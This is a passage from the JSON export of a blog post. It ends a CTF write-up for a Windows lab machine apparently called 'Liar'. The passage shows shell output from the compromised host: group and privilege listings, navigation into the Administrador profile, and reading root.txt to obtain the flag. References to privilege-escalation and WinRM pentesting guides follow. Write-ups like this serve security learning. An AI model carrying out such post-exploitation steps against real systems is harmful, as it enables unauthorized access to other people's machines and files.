habilitado\nWIN-IURF14RBVGV\\Idministritirs               Alias          S-1-5-21-2519875556-2276787807-2868128514-1002 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado\nBUILTIN\\Usuarios                             Alias          S-1-5-32-545                                   Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado\nNT AUTHORITY\\INTERACTIVE                     Grupo conocido S-1-5-4                                        Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado\nINICIO DE SESI\ufffdN EN LA CONSOLA               Grupo conocido S-1-2-1                                        Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado\nNT AUTHORITY\\Usuarios autentificados         Grupo conocido S-1-5-11                                       Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado\nNT AUTHORITY\\Esta compa\ufffd\ufffda                   Grupo conocido S-1-5-15                                       Grupo 
obligatorio, Habilitado de manera predeterminada, Grupo habilitado\nNT AUTHORITY\\Cuenta local                    Grupo conocido S-1-5-113                                      Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado\nNT AUTHORITY\\Autenticaci\ufffdn NTLM              Grupo conocido S-1-5-64-10                                    Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado\nEtiqueta obligatoria\\Nivel obligatorio medio Etiqueta       S-1-16-8192                                                                                                            \n\nINFORMACI\ufffdN DE PRIVILEGIOS\n--------------------------\n\nNombre de privilegio          Descripci\ufffdn                                  Estado       \n============================= ============================================ =============\nSeChangeNotifyPrivilege       Omitir comprobaci\ufffdn de recorrido             Habilitada   \nSeIncreaseWorkingSetPrivilege Aumentar el espacio de trabajo de un proceso Deshabilitado\n\nC:\\Windows\\system32&gt;whoami\nwhoami\nwin-iurf14rbvgv\\akanksha\n\nC:\\Windows\\system32&gt;cd \\User\ncd \\User\nEl sistema no puede encontrar la ruta especificada.\n\nC:\\Windows\\system32&gt;cd ..\/..\/\ncd ..\/..\/\n\nC:\\&gt;dir\ndir\n El volumen de la unidad C no tiene etiqueta.\n El n\ufffdmero de serie del volumen es: 26CD-AE41\n\n Directorio de C:\\\n\n26\/09\/2023  15:12    &lt;DIR&gt;          inetpub\n15\/09\/2018  09:12    &lt;DIR&gt;          PerfLogs\n15\/09\/2018  09:21    &lt;DIR&gt;          Program Files\n15\/09\/2018  09:21    &lt;DIR&gt;          Program Files (x86)\n26\/09\/2023  18:44    &lt;DIR&gt;          Users\n14\/04\/2024  18:36    &lt;DIR&gt;          Windows\n               0 archivos              0 bytes\n               6 dirs  45.687.545.856 bytes libres\n\nC:\\&gt;cd Users\ncd Users\n\nC:\\Users&gt;dir\ndir\n El volumen de la unidad C no tiene etiqueta.\n El n\ufffdmero de serie del volumen 
es: 26CD-AE41\n\n Directorio de C:\\Users\n\n26\/09\/2023  18:44    &lt;DIR&gt;          .\n26\/09\/2023  18:44    &lt;DIR&gt;          ..\n26\/09\/2023  18:36    &lt;DIR&gt;          Administrador\n26\/09\/2023  18:41    &lt;DIR&gt;          akanksha\n14\/04\/2024  14:19    &lt;DIR&gt;          nica\n26\/09\/2023  15:11    &lt;DIR&gt;          Public\n               0 archivos              0 bytes\n               6 dirs  45.687.545.856 bytes libres\n\nC:\\Users&gt;cd akanksha\ncd akanksha\n\nC:\\Users\\akanksha&gt;dir\ndir\n El volumen de la unidad C no tiene etiqueta.\n El n\ufffdmero de serie del volumen es: 26CD-AE41\n\n Directorio de C:\\Users\\akanksha\n\n26\/09\/2023  18:41    &lt;DIR&gt;          .\n26\/09\/2023  18:41    &lt;DIR&gt;          ..\n15\/09\/2018  09:12    &lt;DIR&gt;          Desktop\n26\/09\/2023  18:41    &lt;DIR&gt;          Documents\n15\/09\/2018  09:12    &lt;DIR&gt;          Downloads\n15\/09\/2018  09:12    &lt;DIR&gt;          Favorites\n15\/09\/2018  09:12    &lt;DIR&gt;          Links\n15\/09\/2018  09:12    &lt;DIR&gt;          Music\n15\/09\/2018  09:12    &lt;DIR&gt;          Pictures\n15\/09\/2018  09:12    &lt;DIR&gt;          Saved Games\n15\/09\/2018  09:12    &lt;DIR&gt;          Videos\n               0 archivos              0 bytes\n              11 dirs  45.687.545.856 bytes libres\n\nC:\\Users\\akanksha&gt;cd ..\/Administrador\ncd ..\/Administrador\n\nC:\\Users\\Administrador&gt;dir\ndir\n El volumen de la unidad C no tiene etiqueta.\n El n\ufffdmero de serie del volumen es: 26CD-AE41\n\n Directorio de C:\\Users\\Administrador\n\n26\/09\/2023  18:36    &lt;DIR&gt;          .\n26\/09\/2023  18:36    &lt;DIR&gt;          ..\n26\/09\/2023  15:11    &lt;DIR&gt;          3D Objects\n26\/09\/2023  15:11    &lt;DIR&gt;          Contacts\n26\/09\/2023  15:11    &lt;DIR&gt;          Desktop\n26\/09\/2023  15:11    &lt;DIR&gt;          Documents\n26\/09\/2023  15:11    &lt;DIR&gt;          Downloads\n26\/09\/2023  15:11    
&lt;DIR&gt;          Favorites\n26\/09\/2023  15:11    &lt;DIR&gt;          Links\n26\/09\/2023  15:11    &lt;DIR&gt;          Music\n26\/09\/2023  15:24            16.418 new.cfg\n26\/09\/2023  15:11    &lt;DIR&gt;          Pictures\n26\/09\/2023  18:36                13 root.txt\n26\/09\/2023  15:11    &lt;DIR&gt;          Saved Games\n26\/09\/2023  15:11    &lt;DIR&gt;          Searches\n26\/09\/2023  15:11    &lt;DIR&gt;          Videos\n               2 archivos         16.431 bytes\n              14 dirs  45.687.545.856 bytes libres\n\nC:\\Users\\Administrador&gt;type root.txt\ntype root.txt\nHMV1STWINDOWZ<\/code><\/pre>\n<p>And with that, it is finally over....<\/p>\n<h2>References<\/h2>\n<p><a href=\"https:\/\/blog.syselement.com\/ine\/courses\/ejpt\/hostnetwork-penetration-testing\/5-post-exploit\/win-privesc\">https:\/\/blog.syselement.com\/ine\/courses\/ejpt\/hostnetwork-penetration-testing\/5-post-exploit\/win-privesc<\/a><\/p>\n<p><a href=\"https:\/\/github.com\/Brntpcnr\/WriteupsHMV\/blob\/main\/Liar.txt\">https:\/\/github.com\/Brntpcnr\/WriteupsHMV\/blob\/main\/Liar.txt<\/a><\/p>\n<p><a href=\"https:\/\/book.hacktricks.xyz\/network-services-pentesting\/5985-5986-pentesting-winrm\">https:\/\/book.hacktricks.xyz\/network-services-pentesting\/5985-5986-pentesting-winrm<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Liar Information Gathering Port Scanning rustscan -a 172.20.10.6 &#8212; -A Open 172.2 
[&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-558","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/558","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=558"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/558\/revisions"}],"predecessor-version":[{"id":559,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/558\/revisions\/559"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=558"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=558"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=558"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}